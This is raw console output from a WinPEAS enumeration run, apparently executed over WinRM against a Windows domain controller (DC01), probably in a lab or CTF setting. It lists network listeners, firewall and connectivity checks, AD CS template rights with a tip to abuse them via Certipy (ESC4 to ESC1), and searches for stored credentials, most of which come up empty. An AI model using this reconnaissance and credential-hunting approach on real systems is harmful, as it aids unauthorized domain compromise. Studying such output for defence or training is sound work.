WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               88            0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               135           0.0.0.0               0               Listening         932             svchost                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               389           0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System                             
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               464           0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               593           0.0.0.0               0               Listening         932             svchost                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               636           0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               1433          0.0.0.0               0               Listening         4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               3268          0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               3269          0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System                             
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               9389          0.0.0.0               0               Listening         2916            Microsoft.ActiveDirectory.WebServices                                                                                                      
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System                             
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49664         0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49665         0.0.0.0               0               Listening         496             wininit                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49666         0.0.0.0               0               Listening         1224            svchost                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49667         0.0.0.0               0               Listening         1704            svchost                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49668         0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49677         0.0.0.0               0               Listening         652             lsass                              
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49678         0.0.0.0               0               Listening         2784            spoolsv                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49681         0.0.0.0               0               Listening         640             services                           
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49691         0.0.0.0               0               Listening         2880            certsrv                            
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49705         0.0.0.0               0               Listening         2936            dns                                
WINRM       172.16.55.128   5985   DC01               TCP        0.0.0.0               49761         0.0.0.0               0               Listening         2896            dfsrs                              
WINRM       172.16.55.128   5985   DC01               TCP        127.0.0.1             53            0.0.0.0               0               Listening         2936            dns
WINRM       172.16.55.128   5985   DC01               TCP        127.0.0.1             1434          0.0.0.0               0               Listening         4476            sqlservr
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         53            0.0.0.0               0               Listening         2936            dns                                
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         139           0.0.0.0               0               Listening         4               System                             
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         445           172.16.55.193         54476           Established       4               System                             
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         445           172.16.55.193         55438           Established       4               System                             
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         35720           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         38112           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         39144           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         49774           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         55852           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         56146           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01               TCP        172.16.55.128         1433          172.16.55.193         56550           Established       4476            sqlservr                           
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Enumerating IPv6 connections
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address                               Local Port    Remote Address                              Remote Port     State             Process ID      Process Name                                                                                   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        88            [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        135           [::]                                        0               Listening         932             svchost
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        389           [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        445           [::]                                        0               Listening         4               System
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        464           [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        593           [::]                                        0               Listening         932             svchost
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        636           [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        1433          [::]                                        0               Listening         4476            sqlservr
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        3268          [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        3269          [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        5985          [::]                                        0               Listening         4               System
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        9389          [::]                                        0               Listening         2916            Microsoft.ActiveDirectory.WebServices
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        47001         [::]                                        0               Listening         4               System
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49664         [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49665         [::]                                        0               Listening         496             wininit
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49666         [::]                                        0               Listening         1224            svchost
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49667         [::]                                        0               Listening         1704            svchost
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49668         [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49677         [::]                                        0               Listening         652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49678         [::]                                        0               Listening         2784            spoolsv
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49681         [::]                                        0               Listening         640             services
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49691         [::]                                        0               Listening         2880            certsrv
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49705         [::]                                        0               Listening         2936            dns
WINRM       172.16.55.128   5985   DC01               TCP        [::]                                        49761         [::]                                        0               Listening         2896            dfsrs
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       53            [::]                                        0               Listening         2936            dns
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       389           [::1]                                       49679           Established       652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       389           [::1]                                       49680           Established       652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       389           [::1]                                       49703           Established       652             lsass
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       1434          [::]                                        0               Listening         4476            sqlservr
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       49679         [::1]                                       389             Established       2908            ismserv
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       49680         [::1]                                       389             Established       2908            ismserv
WINRM       172.16.55.128   5985   DC01               TCP        [::1]                                       49703         [::1]                                       389             Established       2936            dns
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                53            [::]                                        0               Listening         2936            dns
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                135           [fe80::c833:192d:dba0:737%4]                50841           Established       932             svchost                                                                                        
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                389           [fe80::c833:192d:dba0:737%4]                49715           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                389           [fe80::c833:192d:dba0:737%4]                49756           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                389           [fe80::c833:192d:dba0:737%4]                49759           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49668         [fe80::c833:192d:dba0:737%4]                49758           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49668         [fe80::c833:192d:dba0:737%4]                49892           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49668         [fe80::c833:192d:dba0:737%4]                50842           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49715         [fe80::c833:192d:dba0:737%4]                389             Established       2936            dns                                                                                            
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49756         [fe80::c833:192d:dba0:737%4]                389             Established       2896            dfsrs                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49758         [fe80::c833:192d:dba0:737%4]                49668           Established       2896            dfsrs                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49759         [fe80::c833:192d:dba0:737%4]                389             Established       2896            dfsrs                                                                                          
WINRM       172.16.55.128   5985   DC01               TCP        [fe80::c833:192d:dba0:737%4]                49892         [fe80::c833:192d:dba0:737%4]                49668           Established       652             lsass                                                                                          
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current UDP Listening Ports
WINRM       172.16.55.128   5985   DC01             È Check for services restricted from the outside 
WINRM       172.16.55.128   5985   DC01               Enumerating IPv4 connections
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address         Local Port    Remote Address:Remote Port     Process ID        Process Name                                              
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               123           *:*                            88                svchost                                                   
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               389           *:*                            652               lsass                                                     
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               500           *:*                            2924              svchost                                                   
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               4500          *:*                            2924              svchost                                                   
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               5353          *:*                            1216              svchost                                                   
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               5355          *:*                            1216              svchost                                                   
WINRM       172.16.55.128   5985   DC01               UDP        0.0.0.0               54227         *:*                            1216              svchost                                                   
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             49222         *:*                            2908              ismserv
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54226         *:*                            2916              Microsoft.ActiveDirectory.WebServices
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54228         *:*                            2896              dfsrs
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54231         *:*                            652               lsass
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             54232         *:*                            1440              svchost
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             59991         *:*                            1508              svchost
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             60979         *:*                            2124              svchost
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             63257         *:*                            2880              certsrv
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             64258         *:*                            3112              dfssvc
WINRM       172.16.55.128   5985   DC01               UDP        127.0.0.1             64542         *:*                            4176              C:\ProgramData\winPEASx64.exe
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         88            *:*                            652               lsass                                                     
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         137           *:*                            4                 System                                                    
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         138           *:*                            4                 System                                                    
WINRM       172.16.55.128   5985   DC01               UDP        172.16.55.128         464           *:*                            652               lsass                                                     
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Enumerating IPv6 connections
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Protocol   Local Address                               Local Port    Remote Address:Remote Port     Process ID        Process Name                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        123           *:*                            88                svchost
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        389           *:*                            652               lsass
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        500           *:*                            2924              svchost
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        4500          *:*                            2924              svchost
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        5353          *:*                            1216              svchost
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        5355          *:*                            1216              svchost
WINRM       172.16.55.128   5985   DC01               UDP        [::]                                        54227         *:*                            1216              svchost
WINRM       172.16.55.128   5985   DC01               UDP        [fe80::c833:192d:dba0:737%4]                88            *:*                            652               lsass                               
WINRM       172.16.55.128   5985   DC01               UDP        [fe80::c833:192d:dba0:737%4]                464           *:*                            652               lsass                               
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Firewall Rules
WINRM       172.16.55.128   5985   DC01             È Showing only DENY rules (too many ALLOW rules always)                                                                                                     
WINRM       172.16.55.128   5985   DC01                 Current Profiles: DOMAIN
WINRM       172.16.55.128   5985   DC01                 FirewallEnabled (Domain):    True
WINRM       172.16.55.128   5985   DC01                 FirewallEnabled (Private):    True
WINRM       172.16.55.128   5985   DC01                 FirewallEnabled (Public):    True
WINRM       172.16.55.128   5985   DC01                 DENY rules:
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ DNS cached --limit 70--
WINRM       172.16.55.128   5985   DC01                 Entry                                 Name                                  Data                                                                        
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access denied 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Internet settings, zone and proxy configuration                                                                                    
WINRM       172.16.55.128   5985   DC01               General Settings
WINRM       172.16.55.128   5985   DC01               Hive        Key                                       Value                                                                                               
WINRM       172.16.55.128   5985   DC01               HKCU        CertificateRevocation                     1                                                                                                   
WINRM       172.16.55.128   5985   DC01               HKCU        DisableCachingOfSSLPages                  0                                                                                                   
WINRM       172.16.55.128   5985   DC01               HKCU        IE5_UA_Backup_Flag                        5.0                                                                                                 
WINRM       172.16.55.128   5985   DC01               HKCU        PrivacyAdvanced                           1                                                                                                   
WINRM       172.16.55.128   5985   DC01               HKCU        SecureProtocols                           10240                                                                                               
WINRM       172.16.55.128   5985   DC01               HKCU        User Agent                                Mozilla/4.0 (compatible; MSIE 8.0; Win32)                                                           
WINRM       172.16.55.128   5985   DC01               HKCU        ZonesSecurityUpgrade                      System.Byte[]                                                                                       
WINRM       172.16.55.128   5985   DC01               HKLM        ActiveXCache                              C:\Windows\Downloaded Program Files                                                                 
WINRM       172.16.55.128   5985   DC01               HKLM        CodeBaseSearchPath                        CODEBASE                                                                                            
WINRM       172.16.55.128   5985   DC01               HKLM        EnablePunycode                            1                                                                                                   
WINRM       172.16.55.128   5985   DC01               HKLM        MinorVersion                              0                                                                                                   
WINRM       172.16.55.128   5985   DC01               HKLM        WarnOnIntranet                            1                                                                                                   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Zone Maps
WINRM       172.16.55.128   5985   DC01               No URLs configured
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               Zone Auth Settings
WINRM       172.16.55.128   5985   DC01               No Zone Auth Settings
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Internet Connectivity
WINRM       172.16.55.128   5985   DC01             È Checking if internet access is possible via different methods                                                                                             
WINRM       172.16.55.128   5985   DC01                 HTTP (80) Access: Accessible
WINRM       172.16.55.128   5985   DC01                 HTTPS (443) Access: Not Accessible
WINRM       172.16.55.128   5985   DC01               [X] Exception:       Error: TCP connect timed out
WINRM       172.16.55.128   5985   DC01                 HTTPS (443) Access by Domain Name: Not Accessible                                                                                                       
WINRM       172.16.55.128   5985   DC01               [X] Exception:       Error: A task was canceled.
WINRM       172.16.55.128   5985   DC01                 DNS (53) Access: Accessible
WINRM       172.16.55.128   5985   DC01                 ICMP (ping) Access: Accessible
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Hostname Resolution
WINRM       172.16.55.128   5985   DC01             È Checking if the hostname can be resolved externally                                                                                                       
WINRM       172.16.55.128   5985   DC01               [X] Exception:     Error during hostname check: A task was canceled.                                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Active Directory Quick Checks ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ gMSA readable managed passwords
WINRM       172.16.55.128   5985   DC01             È Look for Group Managed Service Accounts you can read (msDS-ManagedPassword) https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/gmsa.html                                                                                              
WINRM       172.16.55.128   5985   DC01               [-] No gMSA with readable managed password found (checked 0).                                                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ AD CS misconfigurations for ESC
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates.html                                                      
WINRM       172.16.55.128   5985   DC01             È Check for ADCS misconfigurations in the local DC registry                                                                                                 
WINRM       172.16.55.128   5985   DC01               StrongCertificateBindingEnforcement:  - Allow weak mapping if SID extension missing, may be vulnerable to ESC9.                                           
WINRM       172.16.55.128   5985   DC01               CertificateMappingMethods:  - Strong Certificate mapping enabled.                                                                                         
WINRM       172.16.55.128   5985   DC01               IF_ENFORCEENCRYPTICERTREQUEST set in InterfaceFlags - not vulnerable to ESC11.                                                                            
WINRM       172.16.55.128   5985   DC01               szOID_NTDS_CA_SECURITY_EXT not disabled for the CA - not vulnerable to ESC16.                                                                             
WINRM       172.16.55.128   5985   DC01             È 
WINRM       172.16.55.128   5985   DC01             If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4                                                                          
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: User  (Rights: WriteProperty,ExtendedRight)                                                                               
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: UserSignature  (Rights: WriteProperty,ExtendedRight)                                                                      
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: ClientAuth  (Rights: WriteProperty,ExtendedRight)                                                                         
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: EFS  (Rights: WriteProperty,ExtendedRight)                                                                                
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: login  (Rights: ExtendedRight)                                                                                            
WINRM       172.16.55.128   5985   DC01               Dangerous rights over template: IT-login  (Rights: ExtendedRight)                                                                                         
WINRM       172.16.55.128   5985   DC01               [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Cloud Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                               
WINRM       172.16.55.128   5985   DC01             Learn and practice cloud hacking in training.hacktricks.xyz                                                                                                 
WINRM       172.16.55.128   5985   DC01             AWS EC2?                                No
WINRM       172.16.55.128   5985   DC01             Azure VM?                               No
WINRM       172.16.55.128   5985   DC01             Azure Tokens?                           No
WINRM       172.16.55.128   5985   DC01             Google Cloud Platform?                  No
WINRM       172.16.55.128   5985   DC01             Google Workspace Joined?                No
WINRM       172.16.55.128   5985   DC01             Google Cloud Directory Sync?            No
WINRM       172.16.55.128   5985   DC01             Google Password Sync?                   No
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Windows Credentials ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking Windows Vault
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault                       
WINRM       172.16.55.128   5985   DC01               [ERROR] Unable to enumerate vaults. Error (0x1061)
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking Credential manager
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#credentials-manager--windows-vault                       
WINRM       172.16.55.128   5985   DC01                 [!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               [!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'                                                      
WINRM       172.16.55.128   5985   DC01             Please run:
WINRM       172.16.55.128   5985   DC01             cmdkey /list
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Saved RDP connections
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Remote Desktop Server/Client Settings
WINRM       172.16.55.128   5985   DC01               RDP Server Settings
WINRM       172.16.55.128   5985   DC01                 Network Level Authentication            :
WINRM       172.16.55.128   5985   DC01                 Block Clipboard Redirection             :
WINRM       172.16.55.128   5985   DC01                 Block COM Port Redirection              :
WINRM       172.16.55.128   5985   DC01                 Block Drive Redirection                 :
WINRM       172.16.55.128   5985   DC01                 Block LPT Port Redirection              :
WINRM       172.16.55.128   5985   DC01                 Block PnP Device Redirection            :
WINRM       172.16.55.128   5985   DC01                 Block Printer Redirection               :
WINRM       172.16.55.128   5985   DC01                 Allow Smart Card Redirection            :
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               RDP Client Settings
WINRM       172.16.55.128   5985   DC01                 Disable Password Saving                 :       True                                                                                                    
WINRM       172.16.55.128   5985   DC01                 Restricted Remote Administration        :       False                                                                                                   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Recently run commands
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for DPAPI Master Keys
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi                                                    
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for DPAPI Credential Files
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi                                                    
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for RDCMan Settings Files
WINRM       172.16.55.128   5985   DC01             È Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager                                                                         
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Kerberos tickets
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html                                                            
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for saved Wifi credentials
WINRM       172.16.55.128   5985   DC01               [X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)                            
WINRM       172.16.55.128   5985   DC01             Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'                                                                                
WINRM       172.16.55.128   5985   DC01             No saved Wifi credentials found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking AppCmd.exe
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe                                                
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01                   You must be an administrator to run this check
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking SSClient.exe
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#scclient--sccm                                           
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating SSCM - System Center Configuration Manager settings                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Security Packages Credentials                                                                                                      
WINRM       172.16.55.128   5985   DC01               [X] Exception: Couldn't parse nt_resp. Len: 0 Message bytes: 4e544c4d5353500003000000010001006000000000000000610000000000000058000000000000005800000008000800580000000000000061000000058a80a20a007c4f0000000fec9029b388ebc309b00eccb201a4c1f3440043003000310000   
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                            
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Firefox
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Firefox DBs
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history                                         
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in Firefox history                                                                                                 
WINRM       172.16.55.128   5985   DC01             È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history                                         
WINRM       172.16.55.128   5985   DC01                 Not Found
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Chrome
WINRM       172.16.55.128   5985   DC01                 Info: if no credentials were listed, you might need to close the browser and try again.                                                                 
WINRM       172.16.55.128   5985   DC01             
